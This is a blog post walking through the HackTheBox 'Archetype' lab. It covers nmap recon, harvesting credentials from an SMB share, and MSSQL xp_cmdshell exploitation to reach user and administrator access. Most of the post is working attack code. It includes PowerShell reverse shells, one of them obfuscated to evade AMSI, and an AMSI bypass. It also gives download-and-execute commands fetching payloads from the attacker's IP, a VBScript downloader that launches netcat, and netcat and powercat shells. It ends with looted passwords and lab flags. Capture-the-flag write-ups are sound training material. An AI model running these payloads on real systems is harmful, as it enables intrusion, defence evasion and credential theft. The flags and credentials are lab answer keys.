HTB Archetype

So I’m going to probably post my HackTheBox solutions here so I have somewhere I can look at them in case I’m not home etc.. I sometimes refer back to my notes when I am with clients so I don’t have to reinvent the wheel to solve the same problem, so it would be nice to have them accessible anywhere.

I am going to start off with Archetype, which is an intro box for beginners that I did with my local tech group to help walk them through learning the concepts behind penetration testing.

Recon

So we’re going to start off the box by Nmapping the box, I picked up this little trick somewhere where you quickly scan the box with the -T4 option then go back and scan those open TCP ports with –sVC Performs a script scan using the default set of nse scripts and does service versioning then outputs results to all formats.

ports=$(nmap -p- \u002d\u002dmin-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\
' ',' | sed s/,$//)
nmap -sVC -p$ports 10.10.10.27 -vvv -oA Archtype-AllTCP

With the saved results you will also get verbose output to the screen:

135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-03-24T23:00:14
| Not valid after: 2051-03-24T23:00:14
|_ssl-date: 2021-03-25T00:29:31+00:00; +21m11s from scanner time.
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h45m12s, deviation: 3h07m52s, median: 21m10s
| ms-sql-info: 
| 10.10.10.27:1433: 
| Version: 
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery: 
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\\x00
| Workgroup: WORKGROUP\\x00
|_ System time: 2021-03-24T17:29:26-07:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2021-03-25T00:29:22
|_ start_date: N/A

From the results we can determine:

  • OS – Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
  • Share_Folders – /backups
  • MsSQL – port 1433 – Microsoft SQL Server 2017
  • Win-RM – port 5985

Share Folders

So one of the nse scripts shows that we have some open shares on the machines, the usual go-to tool for this is smbclient. To see which shares are available on a given host use: smbclient -L 10.10.10.27

Alt

You can see we can then use the command smbclient //10.10.10.27/backups to navigate to that backup share name and see any files available, as you see there is a file called prd.dtsConfig , we can use the smbclient to download that file to our local Kali box using the get command and then exit and cat the file. You notice some XML data that contains a hardcoded username and password.

Alt

Foothold

Knowing a dtsConfig is a MsSQL XML configuration file, and seeing the port open on 1433. Most likely these are the login credentials. On Kali theres a program from the Impacket suite of tools: mssqlclient

mssqlclient

Usage: impacket-mssqlclient -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> # Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine

impacket-mssqlclient ARCHETYPE/sql_svc@10.10.10.27 -windows-auth

Alt

From the image you can see we have command access to the database as the sql_svc user. I also looked to explore other tools to achieve this.

Metasploit

Alt Alt

Entering the search parameters in Metasploit for mssql_exec we can use the module then enter our prameters , if you dont specify a payload, it will give you a default reverse meterpreter shell payload.

tsql

The final tool used was tsql which you can install on Kali with apt.

sudo apt update
sudo apt install freetds-bin

Then edit the config file:

nano ~/.freetds.conf

Paste this in nano and ctrl+x to save the file:

[archetype]
host = 10.10.10.27
port = 1433
tds version = 7.4

Use tsql client to connect:

tsql -S archetype -U archtype\\sql_svc

Payloads

Now that there is a semi-foothold on the Archetype through the MsSql account we will have to exploit the machine to further access from MsSQL to a shell. From the Impacket shell check for the ability to run commands on the local machine xp_cmdshell. enable_xp_cmdshell # enables xp_cmdshell

Powershell

Since it was a windows machine usually the first go to would be PowerShell. A quick google will give you a few different reverseshell powershell payloads.

  • powershell reverseshell: hax.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.15.44",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Host the hax.ps1 file with a python webserver on Kali in a new shell tab sudo python3 -m http.server 80 setup a netcat listener to recieve the reverseshell in a new tab nc -lvnp 1234

Run the xp_cmdshell commands in the Impacket shell changing the IP to the Kali tun0 IP: xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.15.44/hax.ps1\");" Alt

If all goes well you should recieve a connection back from Archetype… or not. IF you dont recieve a connection back, check your IP is correct and you also had a connection from Archtype trying to pull the hax.ps1 in your http server.

The issue you may be facing is that your powershell reverseshell was easily detected by Windows Defender and AMSI Found AMSI bypass powershell reverse shell from 0xdarkvortex.dev Switch the code and retry

  • AMSI bypass powershell reverseshell: hax.ps1
while ($true) {$px = "c0","a8","38","1";$p = ($px | ForEach { [convert]::ToInt32($_,16) }) -join '.';$w = "GET /index.html HTTP/1.1`r`nHost: $p`r`nMozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0`r`nAccept: text/html`r`n`r`n";$s = [System.Text.ASCIIEncoding];[byte[]]$b = 0..65535|%{0};$x = "n-eiorvsxpk5";Set-alias $x ($x[$true-10] + ($x[[byte]("0x" + "FF") - 265]) + $x[[byte]("0x" + "9a") - 158]);$y = New-Object System.Net.Sockets.TCPClient($p,80);$z = $y.GetStream();$d = $s::UTF8.GetBytes($w);$z.Write($d, 0, $d.Length);$t = (n-eiorvsxpk5 whoami) + "$ ";while(($l = $z.Read($b, 0, $b.Length)) -ne 0){;$v = (New-Object -TypeName $s).GetString($b,0, $l);$d = $s::UTF8.GetBytes((n-eiorvsxpk5 $v 2>&1 | Out-String )) + $s::UTF8.GetBytes($t);$z.Write($d, 0, $d.Length);}$y.Close();Start-Sleep -Seconds 5}

Alt

You will now see a reverse shell incoming. So we were able to achieve a shell on the machine, lets look at some other methods that we could try.

SMBShare

We will create and SMBShare to host our netcat binary, then use the MsSQL shell to transfer the file and execute it on attack machine:

sudo impacket-smbserver illwill /usr/share/windows-resources/binaries/ -smb2support -username sql_svc -password M3g4c0rp123
nc -lvnp 9001

In second console window on attacker machine:

impacket-mssqlclient ARCHETYPE/sql_svc@10.10.10.27 -windows-auth

while in mssqlclient console:

xp_cmdshell "mkdir c:\illwill"
xp_cmdshell "copy \\10.10.15.44\illwill\nc.exe c:\illwill\"
xp_cmdshell "c:\illwill\nc.exe 10.10.15.44 9001 -e powershell.exe"

or a nice one-liner xp_cmdshell "mkdir c:\illwill && copy \\10.10.15.44\illwill\nc.exe c:\illwill\ && c:\illwill\nc.exe 10.10.15.44 9001 -e powershell.exe"

UPDATE: dont need to copy the file directly, we just execute it fomr the share

impacket-smbserver illwill /usr/share/windows-resources/binaries/ -smb2support -username sql_svc -password M3g4c0rp123
xp_cmdshell \\10.10.15.44\illwill\nc.exe 10.10.15.44 1234 -e cmd.exe

COPYING FROM METASPLOIT

Alt

Downloading using VBS ADODB.Stream

This as an old trick that I’ve been using since XP days before Powershell was available, it uses VBScript Active Scripting language to download the file. The ADO Stream Object is used to read, write, and manage a stream of binary data or text, in this case over HTTP. We’re going to do this from the tsql shell this time. Make sure you have the http listener open still and a netcat shell, and change the code below to you Kali tun0 VPN IP.

Hit enter after pasting each of these comamnds in the shell:

EXEC sp_configure 'xp_cmdshell', 1; 
GO
EXEC xp_cmdshell 'cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>%temp%\illwill.vbs &@echo objXMLHTTP.open "GET","http://10.10.15.44/netcat.exe",false>>%temp%\illwill.vbs&@echo objXMLHTTP.send()>>%temp%\illwill.vbs&@echo If objXMLHTTP.Status=200 Then>>%temp%\illwill.vbs&@echo Set objADOStream=CreateObject("ADODB.Stream")>>%temp%\illwill.vbs&@echo objADOStream.Open>>%temp%\illwill.vbs&@echo objADOStream.Type=1 >>%temp%\illwill.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>%temp%\illwill.vbs&@echo objADOStream.Position=0 >>%temp%\illwill.vbs&@echo objADOStream.SaveToFile "%temp%\netcat.exe">>%temp%\illwill.vbs&@echo objADOStream.Close>>%temp%\illwill.vbs&@echo Set objADOStream=Nothing>>%temp%\illwill.vbs&@echo End if>>%temp%\illwill.vbs&@echo Set objXMLHTTP=Nothing>>%temp%\illwill.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>%temp%\illwill.vbs&@echo objShell.Exec("%temp%\netcat.exe 10.10.15.44 1234 -e cmd.exe")>>%temp%\illwill.vbs&cscript.exe %temp%\illwill.vbs"';
GO

Alt

USER

Now that we have a foothold we can just go get the user.txt grab the user.txt contents Alt

ROOT

So now that we have user permission, let’s get some situational awareness to see how we can escalate. You may be tempted to continue using PowerShell for recon, so make things easier if you’re in the original PowerShell shell, you can disable AMSI

Amsi ByPass

$Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils'); $Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);

ON Attacker Box: python3 -m http.server 80

On Archetype:

IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.15.44/powercat.ps1');powercat -c 10.10.15.44 -p 1234 -e cmd

Alt As you see you can happily download scripts into memory without Defender going crazy.

Part of the recon I found that there were credentials logged into PowerShell,

Alt

Because WinRM port was open, I decided to try to get an interactive connection with these found credentials using CrackMapExec to get the contents of root.txt

Alt

I never circled back around to attempt more exploits, when I get time I will try a few and update this post.

LOOT

User = ARCHETYPE\sql_svc Password = M3g4c0rp123

User = ARCHETYPE\administrator MEGACORP_4dm1n!! Password = MEGACORP_4dm1n!!

user_flag: 3e7b102e78218e935bf3f4951fec21a3

root_flag: b91ccec3305e98240082d4474b848528

Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *